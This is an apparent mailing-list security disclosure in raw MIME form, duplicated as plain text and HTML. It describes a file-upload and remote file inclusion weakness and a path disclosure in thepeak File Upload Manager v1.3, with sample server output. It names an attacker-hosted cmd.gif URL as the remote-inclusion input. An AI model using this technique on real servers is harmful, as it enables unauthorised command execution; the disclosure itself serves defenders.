------=_NextPart_001_001D_01C4B276.D1A0FC10
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Justin_T
#NT - Undernet
justint@orangemail.com.do
hi,
there is a posiblity path disclosure and run commands on a server usint =
thepeak File Upload v1.3
searching for /fileupload/index.php an attacker can upload a malicious =
jpg of gif and can execute commands or make a file inclusion,
but it cant be directly to upload a php file with .jpg extension, =
because detect the content type as text/plain, look this:
name : cmd.jpg=20
type : text/plain <--- when you upload the file the content type is =
seem like this
tmp_name : /tmp/phpF0AItw <-- this is a copy of the file in the server =
with a ramdom temp
error : 0=20
size : 26564=20
http://server.com/fileupload/store/cmd.jpg <--- this is where is stored =
the original file
there is a 2 ways to get in
cracking the content-type when uploading the file or constructing an =
malicious jpg image with some commands:
1: chmod the dir for file inclusion
2: run certain commands on server, etc
Path Disclosure
when you try to put in input of upload file something like
http://www.attacker.com/command.jpg its seem the path of the web files =
like this:
File Upload Manager v1.3 =A9 thepeak =20
name : http://www.attacker.com/cmd.gif=20
type : application/octet-stream=20
tmp_name : /tmp/phptd8aE0=20
error : 0=20
size : 0=20
Warning: copy(store/http://www.attacker.com/cmd.gif): failed to open =
stream: No such file or directory in =
/home/user/public_html//fileupload/index.php on line 471
ERROR: cannot upload, please chmod the dir to 777
some servers accept the file inclusion and you get this
name : http://www.attacker.com/cmd.gif=20
type : application/octet-stream=20
tmp_name : /tmp/phptd8aE0=20
error : 0=20
size : 1035
file uploaded!
sorry for my english, is no good :), i can put more info, but in my =
country we had a bad=20
------=_NextPart_001_001D_01C4B276.D1A0FC10
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Justin_T
#NT - Undernet
justint@orangemail.com.do
hi,
there is a posiblity path disclosure =
and run=20
commands on a server usint thepeak File Upload v1.3
searching for /fileupload/index.php an =
attacker can=20
upload a malicious jpg of gif and can execute commands or make a file=20
inclusion,
but it cant be directly to upload =
a php file=20
with .jpg extension, because detect the content type as text/plain, look =
this:
name : cmd.jpg
type : text/plain <--- when you upload =
the file=20
the content type is seem like this
tmp_name :=20
/tmp/phpF0AItw <-- this is a copy of the file in the server with a =
ramdom=20
temp
error : 0
size=20
: 26564
there is a 2 ways to get =
in
cracking the content-type when =
uploading the file=20
or constructing an malicious jpg image with some commands:
1: chmod the dir for file =
inclusion
2: run certain commands on server, =
etc
Path =
Disclosure
when you try to put in input of upload =
file=20
something like
http://www.attacker.com/comm=
and.jpg=20
its seem the path of the web files like this:
some servers accept the file inclusion =
and you get=20
this
name : http://www.attacker.com/cmd.gif
type : =
application/octet-stream
tmp_name : /tmp/phptd8aE0
error : 0
size : =
1035
file uploaded!
sorry for my=20
english, is no good :), i can put more info, but in my country we had a =
bad=20
------=_NextPart_001_001D_01C4B276.D1A0FC10--
![http://server.com/fileupload/store/cmd.jpg](3D"http://server.com/fileupload/store/cmd.jpg"){kind=link}
![](3D"http://www.attacker.com/cmd.gif")
ERROR: cannot upload, please chmod =
the dir to=20
777